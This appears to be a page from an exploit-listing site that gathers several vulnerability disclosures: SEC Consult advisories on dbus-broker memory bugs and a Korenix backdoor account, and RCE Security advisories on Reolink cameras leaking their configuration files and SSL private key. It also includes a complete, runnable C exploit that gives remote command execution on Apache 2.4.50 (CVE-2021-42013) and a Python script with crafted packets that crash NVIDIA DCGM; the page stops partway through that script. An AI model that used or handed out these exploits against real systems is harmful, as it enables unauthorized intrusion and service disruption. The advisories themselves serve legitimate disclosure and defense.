Latest exploits :: CodePwn

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220602-0 > ======================================================================= title: Multiple Memory Corruption Vulnerabilities product: dbus-broker vulnerable version: dbus-broker-29 fixed version: dbus-broker-31 CVE number: CVE-2022-31212, CVE-2022-31213 impact: medium homepage: https://github.com/bus1/dbus-broker found: 2022-01-14 by: S. Robertz (Office Vienna) G. Hechenberger (Office Vienna) T. Weber (Office Vienna) T. Longin (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "The dbus-broker project is an implementation of a message bus as defined by the D-Bus specification. Its aim is to provide high performance and reliability, while keeping compatibility to the D-Bus reference implementation. It is exclusively written for Linux systems, and makes use of many modern features provided by recent linux kernel releases." Source: https://github.com/bus1/dbus-broker Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. Vulnerability overview/description: ----------------------------------- 1) Stack-Buffer Over-Read (CVE-2022-31212) Dbus-Broker depends on c-uitl/c-shquote to parse DBus service's Exec line. c-shquote contains a stack buffer over-read if a malicious Exec line is supplied. 2) Null Pointer Dereference (CVE-2022-31213) Multiple Null Pointer references can be found when supplying a malformed XML config file. Proof of concept: ----------------- 1) Stack-Buffer Over-Read (CVE-2022-31212) Following harness was used to fuzz the function c_shquote_parse_argv() as it is used in src/launch/launcher.c of dbus-broker. ------------------------------------------------------ #include <sys/types.h> #include <unistd.h> #include <stdio.h> #include <string.h> #include "c-shquote.h" #define SIZE_65KB 66560 int main(int argc, char** argv) { char fuzz_buf[SIZE_65KB] = ""; ssize_t fuzz_len = read(STDIN_FILENO, fuzz_buf, SIZE_65KB); char **out_argv; ssize_t out_argc; c_shquote_parse_argv(&out_argv, &out_argc, fuzz_buf, strlen(fuzz_buf)); return 0; } ---------------------------------------------------------- Passing \xff to the STDIN of the testharness will cause following crash: ---------------------------------------------------------- ==21744==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff98c675bf at pc 0x558e29cacc02 bp 0x7fff98c67490 sp 0x7fff98c67488 READ of size 1 at 0x7fff98c675bf thread T0 #0 0x558e29cacc01 in c_shquote_strncspn c-shquote/src/c-shquote.c:119:21 #1 0x558e29caff15 in c_shquote_parse_next c-shquote/src/c-shquote.c:540:31 #2 0x558e29cb09c2 in c_shquote_parse_argv c-shquote/src/c-shquote.c:620:21 #3 0x558e29cab7e9 in c-shquote/src/argv_parser.c:23:2 #4 0x7f07953a8b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24) #5 0x558e29bca15d in _start (c-shquote/src/harness_argv_parser+0x2015d) Address 0x7fff98c675bf is located in stack of thread T0 at offset 287 in frame #0 0x558e29cac54f in c_shquote_strncspn c-shquote/src/c-shquote.c:102 This frame has 1 object(s): [32, 287) 'buffer' (line 103) <== Memory access at offset 287 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow c-shquote/src/c-shquote.c:119:21 in c_shquote_strncspn Shadow bytes around the buggy address: 0x100073184e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100073184e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100073184e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100073184e90: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 0x100073184ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100073184eb0: 00 00 00 00 00 00 00[07]f3 f3 f3 f3 f3 f3 f3 f3 0x100073184ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100073184ed0: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 0x100073184ee0: 00 f2 f2 f2 00 f3 f3 f3 00 00 00 00 00 00 00 00 0x100073184ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100073184f00: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone:f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==21744==ABORTING ------------------------------------------------------ The error occurs in the functions c_shquote_strnspn() and c_shquote_strncspn(). Both allocate a buffer like this: bool buffer[UCHAR_MAX] = {}; UCHAR_MAX is defined in the C standard header limits.h and equals 255. Thus, array indexes of 0-254 can be addressed. However, the buffer will then be accessed like this: buffer[(unsigned char)string[i]], where string is the commandline from STDIN (or the EXEC line in case of dbus-broker services). Passing \xff will thus read an out of bounds array element. 2) Null Pointer Dereference (CVE-2022-31213) The dbus-broker config parser uses the expat library to parse XML files. <limit name="max_pendingonment"/> is a valid XML line. Thus expat will parse it correctly. As no value is supplied in the statement, the limit_max_pendingonment parameter will contain a Null pointer. DBus-broker does not validate the result and tries to dereference the field, causing a crash. Multiple other XML edge case can be found that cause the expat library to correctly return a Null pointer, but are not handled correctly by the dbus-broker. Including <limit name="max_pendingonment"/> causes following error message: ------------------------- Program received signal SIGSEGV, Segmentation fault. 0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6 Missing separate debuginfos, use: yum debuginfo-install expat-2.2.5-4.el8.x86_64 libblkid- 2.32.1-28.el8.x86_64 libcap-2.26-5.el8.x86_64 libgcc-8.5.0-4.el8_5.x86_64 libmount-2.32.1- 28.el8.x86_64 libselinux-2.9-5.el8.x86_64 libuuid-2.32.1-28.el8.x86_64 pcre2-10.32- 2.el8.x86_64 sssd-client-2.5.2-2.el8_5.1.x86_64 systemd-libs-239-51.el8.x86_64 (gdb) bt #0 0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6 #1 0x000000000040cf0a in util_strtou64 (valp=valp@entry=0x828bc8, string=0x0) at ../src/util/string.c:42 #2 0x0000000000408f07 in config_parser_end_fn (userdata=0x7fffffffdf58, name=0x82278c "limit") at ../src/launch/config.c:1140 #3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1 #4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1 #5 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1 #6 0x000000000040425f in config_parser_include (parser=0x7fffffffdf50, root=0x0, node=<optimized out>, nss_cache=0x7fffffffdf30, dirwatch=0x8192a0) at ../src/launch/config.c:1289 #7 config_parser_read (parser=parser@entry=0x7fffffffdf50, rootp=rootp@entry=0x7fffffffdf28, path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf30, dirwatch=0x8192a0) at ../src/launch/config.c:1347 #8 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe098) at ../src/launch/harness-config.c:24 ------------------------- Following harness was used: ------------------------- #include <c-list.h> #include <c-stdaux.h> #include <stdlib.h> #include "launch/config.h" #include "launch/nss-cache.h" #include "util/dirwatch.h" int main(int argc, char **argv) { _c_cleanup_(config_parser_deinit) ConfigParser parser = CONFIG_PARSER_NULL(parser); _c_cleanup_(config_root_freep) ConfigRoot *rootp = NULL; _c_cleanup_(nss_cache_deinit) NSSCache nss_cache = NSS_CACHE_INIT; _c_cleanup_(dirwatch_freep) Dirwatch *dirwatch = NULL; int r; r = dirwatch_new(&dirwatch); config_parser_init(&parser); r = config_parser_read(&parser, &rootp, argv[1], &nss_cache, dirwatch); return 0; } ------------------------- Following config file will cause another error: ------------------------- 00000000: 3c21 2d2d 202d 2d3e 0a0a 3c21 444f 4354 ..<!DOCT 00000010: 5950 4520 6720 5055 424c 4943 2022 2d2f YPE g PUBLIC "-/ 00000020: 4e22 0a20 2268 7474 223e 0a3c 6275 7363 N". "htt">.<busc 00000030: 6f6e 6669 673e 0a0a 203c 7479 7065 3e73 onfig>.. <type>s 00000040: 643c 2f74 7970 653e 3c66 6f72 6b2f 3e0a d</type><fork/>. 00000050: 203c 7374 616e 6461 7264 5f73 7973 e803 <standard_sys.. 00000060: 6d5f 7365 7276 6963 6564 6972 732f 3e0a m_servicedirs/>. 00000070: 203c 7365 7276 6963 6564 6972 2072 6563 <servicedir rec 00000080: 6569 7665 5f74 7970 653d 2265 7272 6f72 eive_type="error 00000090: 222f 3e0a 3c61 6c6c 6f77 2072 6563 6569 "/>.<allow recei 000000a0: 7665 5f74 7970 653d 2273 6967 6e61 6c22 ve_type="signal" 000000b0: 2f3e 2d3e 203c 616c 6c6f 7720 7365 6e64 />-> <allow send 000000c0: 5f64 6573 7469 6e61 7469 6f6e 3d22 220a _destination="". 000000d0: 2020 2073 656e 645f 696e 7465 7266 6163 send_interfac 000000e0: 653d 2222 202f 3e0a 3c61 6c6c 6f77 2073 e="" />.<allow s 000000f0: 656e 645f 6465 7374 696e 617d 696f 6e3d end_destina}ion= 00000100: 2222 0a20 2020 7365 6e64 5f69 6e74 6572 "". send_inter 00000110: 6661 6365 3d22 6f72 6522 2f3e 203c 212d face="ore"/> <!- 00000120: 2d20 2d2d 3e20 3c64 656e 7920 7365 6e64 - --> <deny send 00000130: 5f64 6573 74 _dest ------------------------- The error is following: ------------------------- id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 Unknown element in /fuzzing_Data/dbus-broker-config/out/harness-config2-- /crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +8: standard_sysm_servicedirs Unknown attribute in /fuzzing_Data/dbus-broker-config/out/harness-config2-- /crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +9: receive_type="error" Program received signal SIGSEGV, Segmentation fault. 0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6 #0 0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6 #1 0x00007ffff78714e2 in strdup () from /lib64/libc.so.6 #2 0x0000000000408e96 in config_parser_end_fn (userdata=0x7fffffffdf48, name=0x81b45c "servicedir") at ../src/launch/config.c:1130 #3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1 #4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1 #5 0x00007ffff7b9fb6b in doProlog () from /lib64/libexpat.so.1 #6 0x00007ffff7ba0a5f in prologProcessor () from /lib64/libexpat.so.1 #7 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1 #8 0x000000000040425f in config_parser_include (parser=0x7fffffffdf40, root=0x0, node=<optimized out>, nss_cache=0x7fffffffdf20, dirwatch=0x8192a0) at ../src/launch/config.c:1289 #9 config_parser_read (parser=parser@entry=0x7fffffffdf40, rootp=rootp@entry=0x7fffffffdf18, path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf20, dirwatch=0x8192a0) at ../src/launch/config.c:1347 #10 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe088) at ../src/launch/harness-config.c:24 ------------------------- Vulnerable / tested versions: ----------------------------- The Git Master branch (dbus-broker-29) has been tested and found to be vulnerable (tested at commit 727bee57cd3e3b5806eb8599abbdd49984b75732). Furthermore, it also contains the vulnerable c-shquote library (tested at commit 83ccc2893385fcca1424b188f0f6c45a62f2b38d). Vendor contact timeline: ------------------------ 2022-04-01: Contacting vendor email. 2022-04-04: Sending advisory via unencrypted email. 2022-04-19: Bugs are fixed. New version will be released 2022-04-20. 2022-05-10: dbus-broker-30 released. 2022-05-16: dbus-broker-31 released with further fixes. 2022-06-02: Release of security advisory. Solution: --------- Update to the latest version. The vendor provides an updated version v30. v31 is available now which should be used as other introduced bugs have been fixed there: https://github.com/bus1/dbus-broker/releases/tag/v31 Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF S. Robertz, G. Hechenberger, T. Weber, T. Longin / @2022 </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220531-0 > ======================================================================= title: Backdoor account product: Korenix JetPort 5601V3 vulnerable version: Firmware version 1.0 fixed version: None CVE number: CVE-2020-12501 impact: High homepage: https://www.korenix.com/ found: 2020-04-06 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market- oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines [...]. Our products are mainly applied in SMART industries: Surveillance, Machine-to- Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. [...]" Source: https://www.korenix.com/en/about/index.aspx?kind=3 Business recommendation: ------------------------ The vendor stated that they "will not remove the hardcoded backdoor account as it is needed for customer support and it can't be cracked in a reasonable amount of time." SEC Consult recommends not to use those devices in production environments and to perform a thorough security review conducted by security professionals to identify and resolve potential further critical security issues. Vulnerability overview/description: ----------------------------------- 1) Backdoor Accounts (CVE-2020-12501) Multiple different backdoor accounts were found during quick security checks of different firmware files. One backdoor account was tested on a later bought device to verify this specific finding. A telnet service is running on the device by default. This increases the risk of exploitation on the local network. Proof of concept: ----------------- 1) Backdoor Accounts (CVE-2020-12501) The following account is available on at least one JetPort device of Korenix. There might be more affected devices across this vendor. Westermo and Comtrol devices may be affected too. * User "superrd", present on: - JetPort 5601V3 More devices may be affected. Two other users are present on the system according to "/etc/passwd". An additional telnet-daemon is listening on port 19999. root:<no password> superrd:<not cracked> admin:admin By inspecting "/etc/passwd", the only user that is allowed to login to the device is "superrd": root::0:0:root:/root:/bin/false superrd:$1$<redacted>:0:0::/root:/bin/sh admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true The listener has been identified by using "ps" and "netcat": # ps PID Uid VmSize Stat Command 1 root 1452 S init [3] [...] 253 root 1780 S /usr/bin/ser2net -p 600 -c /tmp/com2ip.conf 254 root 288 S /usr/sbin/telnetd -p 19999 289 root 788 S /usr/bin/dropbear 297 root 1916 S /usr/bin/thttpd -C /etc/thttpd.conf -cert /etc/thttpd # netstat -tulen Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State [...] tcp 0 0 0.0.0.0:19999 0.0.0.0:* LISTEN [...] The vulnerability has been manually verified on an emulated device by using the MEDUSA scalable firmware runtime. Vulnerable / tested versions: ----------------------------- The following product / firmware version has been tested: * Korenix JetPort 5601V3 / 1.0 Vendor contact timeline: ------------------------ 2020-04-14: Contacting CERT@VDE through info@cert.vde.com and requested support for the disclosure process due to the involvement of multiple vendors. 2020-04-15: Security contact responded, that the products were developed by Korenix Technologies. 2020-04-30: Security contact informed us, that some vulnerabilities were confirmed by the vendor. 2020-07-30: Call with Pepperl+Fuchs contact. Contact stated that the vulnerabilities were reported to Korenix. 2020-09-29: Call with Pepperl+Fuchs and CERT@VDE regarding status. Pepperl+Fuchs stated that they just have a sales contact from Korenix. 2020-10-05: Coordinated release of SA-20201005-0. 2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated that no case regarding vulnerabilities were opened and created one. The product owners of Westermo, Korenix and Beijer Electronics were informed via this inquiry. Set disclosure date to 2020-11-25. 2020-10-06: Restarted the whole responsible disclosure process by sending a request to the new security contact cs@beijerelectronics.com. 2020-10-07: Received an email from a Korenix representative which offered to answer questions about product security. Started responsible disclosure by requesting email certificate or whether plaintext can be used. Referred to the request to cs@beijerelectronics.com. No answer. 2020-11-11: Asked the representatives of Korenix and Beijer regarding the status. No answer. 2020-11-25: Phone call with security manager of Beijer. Sent advisories via encrypted archive to cs@beijerelectronics.com. Received confirmation of advisory receipt. Security manager told us that he can provide information regarding the timeline for the patches within the next two weeks. 2020-12-09: Asked for an update. 2020-12-18: Call with security manager of Beijer. Vendor presented initial analysis done by the affected companies. 2021-03-21: Security manager invited SEC Consult to have a status meeting. 2021-03-26: Agreed on an advisory split as other affected products will get patched later. 2021-04-12: Performed advisory split. 2021-05-26: Meeting regarding advisory publication. Agreed to release this advisory in Q4. 2021-06-01: Released related advisory SA-20210601-0. 2021-06-24: Beijer Electronics contact informs us that he leaves the company today. Refers us to new contact in CC. 2021-07-05: Follow-up meeting with new vendor contact regarding next steps. 2021-07-16: Contact from Beijer Electronics reached out to Korenix. Engineers from Korenix are still investigating the issues. JetWave 2311 went EoL, next status update in August 2021. JetPort will be fixed in Q1 2022. 2021-09-15: Asked for status update; 2021-09-20: Korenix will provide a time schedule for the patches by end of next week. 2021-09-28: Meeting regarding the schedule. Fixes will be available by end of the year for Korenix JetWave series. 2021-09-28: Update call with vendor; Fixes will be available in November. 2021-11-18: Contact had difficulties to get a response from Korenix. JetWave 2212G 1.8.0 has been released, other fixes will be released in December. 2021-11-22: Vendor provides all other fixed versions, which have already been put online. 2021-12-17: Performed another advisory split. 2021-12-20: Update call with vendor. Identified another possibly affected device (JetWave 3420). Investigation will be started from Korenix as soon as possible. 2021-12-28: Vendor has rolled out an update for the JetWave 3420 V3 firmware. 2022-01-17: Informed vendor about the advisory release within the next two weeks. 2022-01-19: Call with vendor; agreed that advisory can be published for JetWave series. 2022-01-24: Informed vendor about advisory release on 2022-01-31. 2022-01-31: Released related advisory SA-20220131-0. 2022-02-22: Vendor says, that fixes are estimated to be completed by end of February. 2022-03-29: Most issues from the related advisories (SA-20201005-0, SA-20210601-0) are not applicable according to the vendor, only the backdoor account exists in the JetPort series. The JetPort series will not go end of life. The backdoor is needed in order to assist customers with problems and Korenix claims the password can't be cracked in a reasonable amount of time, hence it will not be fixed. Security contact states that there is no point in waiting and we can release the security advisory. 2022-04-05: Another call to clarify with security contact; Korenix will not remove the account as this issue is not considered as critical. 2022-05-18: Tried to re-send the advisory for final review which only contains the backdoor account information. Received auto-reply that our contact from Beijer Group (who did the coordination with Korenix) was no longer part of the company. 2022-05-31: Public release of security advisory. Solution: --------- None available. The vendor stated that they "will not remove the hardcoded backdoor account as it is needed for customer support and it can't be cracked in a reasonable amount of time." Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Atos company Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Thomas Weber / @2022 </code></pre>

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Reolink E1 Zoom Camera Vendor URL: https://reolink.com/product/e1-zoom/ Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200] Date found: 2021-08-26 Date published: 2022-06-01 CVSSv3 Score: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) CVE: CVE-2021-40150 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Reolink E1 Zoom Camera 3.0.0.716 (latest) and below 4. INTRODUCTION =============== Meet new generation of Reolink E1 series. Advanced features - 5MP Super HD & optical zoom are added into this compact camera. Plus two-way audio, remote live view and more smart capacities help you connect with what you care. Be closer to families and be away from worries. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations by querying, i.e.: http://[CAM-IP]/conf/nginx.conf http://[CAM-IP]/conf/fastcgi.conf Etc. 6. RISK ======= An unauthenticated attacker can download the webserver's configuration files which might lead to sensitive information disclosure. 7. SOLUTION =========== None. 8. REPORT TIMELINE ================== 2021-08-26: Discovery of the vulnerability 2021-08-26: Sent notification to Reolink via their support channel 2021-08-26: Response from vendor asking for vulnerability details 2021-08-26: Sent all the vulnerability details 2021-08-31: Vendor is still looking into the issue 2021-09-03: Vendor states that the issue will be fixed with the next firmware update by the end of September. 2021-10-01: Since no firmware has been released, we've sent another notification 2021-10-02: Vendor states that the new firmware is delayed 2022-02-01: Since there is still fix, sent another notification 2022-02-02: Vendor states that the firmware with the fix hasn't been released yet. 2022-03-03: Since there is still fix, sent another notification 2022-03-12: Vendor states they're still working on the issue (internal update awaits testing) 2022-05-24: Since there is still fix, sent another notification 2022-05-24: Vendor states that the update still hasn't been released yet. 2022-06-01: Almost a year should be enough to fix this. Public disclosure. 9. REFERENCES ============= https://github.com/MrTuxracer/advisories </code></pre>

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Reolink E1 Zoom Camera Vendor URL: https://reolink.com/product/e1-zoom/ Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200] Date found: 2021-08-26 Date published: 2022-06-01 CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) CVE: CVE-2021-40149 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Reolink E1 Zoom Camera 3.0.0.716 (latest) and below 4. INTRODUCTION =============== Meet new generation of Reolink E1 series. Advanced features - 5MP Super HD & optical zoom are added into this compact camera. Plus two-way audio, remote live view and more smart capacities help you connect with what you care. Be closer to families and be away from worries. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The web server of the E1 Zoom camera through 3.0.0.716 discloses its SSL private key via the root web server directory. An unauthenticated attacker can abuse this with network-level access to the camera to download the webserver's private SSL key by simply going to the following URL: http://[CAM-IP]/self.key 6. RISK ======= An unauthenticated attacker can download the webserver's SSL private key and thereby attack the encrypted network traffic to and from the camera, which might lead to the disclosure of the administrative access credentials and other sensitive information. 7. SOLUTION =========== None. 8. REPORT TIMELINE ================== 2021-08-26: Discovery of the vulnerability 2021-08-26: Sent notification to Reolink via their support channel 2021-08-26: Response from vendor asking for vulnerability details 2021-08-26: Sent all the vulnerability details 2021-08-31: Vendor is still looking into the issue 2021-09-03: Vendor states that the issue will be fixed by the end of September. 2021-10-01: Since no firmware has been released, we've sent another notification 2021-10-02: Vendor states that the new firmware is delayed 2022-02-01: Since there is still fix, sent another notification 2022-02-02: Vendor states that the firmware with the fix hasn't been released yet. 2022-03-03: Since there is still fix, sent another notification 2022-03-12: Vendor states they're still working on the issue (internal update awaits testing) 2022-05-24: Since there is still fix, sent another notification 2022-05-24: Vendor states that the update still hasn't been released yet. 2022-06-01: Almost a year should be enough to fix this. Public disclosure. 9. REFERENCES ============= https://github.com/MrTuxracer/advisories </code></pre>

<pre><code>#include <stdio.h> #include <stdlib.h> #include <stdbool.h> #include <string.h> #include <curl/curl.h> /* Apache 2.4.50 exploit (CVE-2021-42013) * Author: Vilius Povilaika * Website: www.povilaika.com */ // compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013 int usage(char* prog) { printf("Usage: %s <host> <exec>\n", prog); printf(" - %s https://127.0.0.1 \"uname -a\"\n", prog); return 0; } bool error(const char* reason) { printf("[ERR] Critical error - %s\n", reason); return false; } struct callback_result { char* data; size_t size; }; static size_t callback(void* pointer, size_t size, size_t nmemb, void* data) { struct callback_result *memory = (struct callback_result *)data; char* ptr = realloc(memory->data, memory->size+nmemb+1); memory->data = ptr; memcpy(&(memory->data[memory->size]), pointer, nmemb); memory->size += nmemb; memory->data[memory->size] = 0; return nmemb; } bool exploit(void* result, char* host, char* exec) { CURL *curl = curl_easy_init(); char url[256]; sprintf(url, "%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh", host); curl_easy_setopt(curl, CURLOPT_URL, url); char payload[256]; sprintf(payload, "echo Content-Type: text/plain; echo; %s", exec); curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback); curl_easy_setopt(curl, CURLOPT_WRITEDATA, result); int res = curl_easy_perform(curl); if (res != CURLE_OK) return error(curl_easy_strerror(res)); curl_easy_cleanup(curl); return true; } int main(int argc, char* argv[]) { if (argc != 3) return usage(argv[0]); struct callback_result result = {0}; bool res = exploit(&result, argv[1], argv[2]); if (res) printf("[+] Exploit finished successfully, check output\n"); else printf("[-] Exploit failed, check output\n"); printf(" \n%s\n", result.data); return 0; } </code></pre>

<pre><code>#!/usr/bin/python3 # -*- coding: UTF-8 -*- # # heart.py # # NVIDIA Data Center GPU Manager Remote Memory Corruption Vulnerability # # Jeremy Brown [jbrown3264/gmail] # # NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health # data. nv-hostengine is a daemon that by default listens on the loopback interface, # but can also listen on the network for requests coming in on port 5555 (remote mgmt). # A native client named DCGMI allows users to make requests to the daemon to support # a variety of functions. Malformed packets can cause the daemon (running as root # or user account) to crash or potentially result in code execution. # # More info: https://docs.nvidia.com/datacenter/dcgm/latest/index.html # # Tested on Ubuntu 20.04 x64 with package datacenter-gpu-manager v2.3.1 (< v2.3.5 affected) # # $ ./heart.py 10.0.0.201 --trigger pkt3-mem # # $ gdb `which nv-hostengine` # (gdb) r -b ALL -n # nv-hostengine running as non-root. Some functionality will be limited. # Started host engine version 2.3.1 using port number: 5555 # ... # Thread 2 "nv-hostengine" received signal SIGSEGV, Segmentation fault. # # (gdb) i r # rax 0x7ffbb3dbd010 140719031046160 # rbx 0x7ffff771ac70 140737344810096 # rcx 0x7ffbb3dbd010 140719031046160 # rdx 0x424242420 17786217504 # rsi 0x7ffff771aee4 140737344810724 # rdi 0x7ffbb3dbd010 140719031046160 # rbp 0x7ffff771ac40 0x7ffff771ac40 # rsp 0x7ffff771abe8 0x7ffff771abe8 # r8 0x424242420 17786217504 # r9 0x0 0 # r10 0x7ffbb3dbd010 140719031046160 # # CVE‑2022‑21820 # import os import sys import argparse import time import shutil import signal import socket DEFAULT_PORT = 5555 PKT_START = b'\xad\xbc\xbc\xad' # # Trigger #1: Memory Corruption via malformed packet 3 # TRIGGER_ONE_PKT_1 = PKT_START + \ b'\x01\x00\x00\x00\x11\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x0f\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00' TRIGGER_ONE_PKT_2 = PKT_START + \ b'\x01\x00\x00\x00\x1a\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x0a\x18\x08\x03\x10\x03\x18\x00\x28\x00\x42\x05\xc2\x01\x02\x08\x00\x48\xa4\xec\xc4\x94\x81\x83\xf5\x02' # 0x84 maps to 'B' here and crashes with rdx/r8=0x424242420 TRIGGER_ONE_PKT_3 = PKT_START + \ b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01\x00' + \ b'\x84' * 51 + \ b'\x00' * 488 + \ b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \ b'\x00' * 207 + \ b'\x01\x00\x00\x00' # # Trigger #2: NULL ptr write via malformed packet 4 # TRIGGER_TWO_PKT_1 = 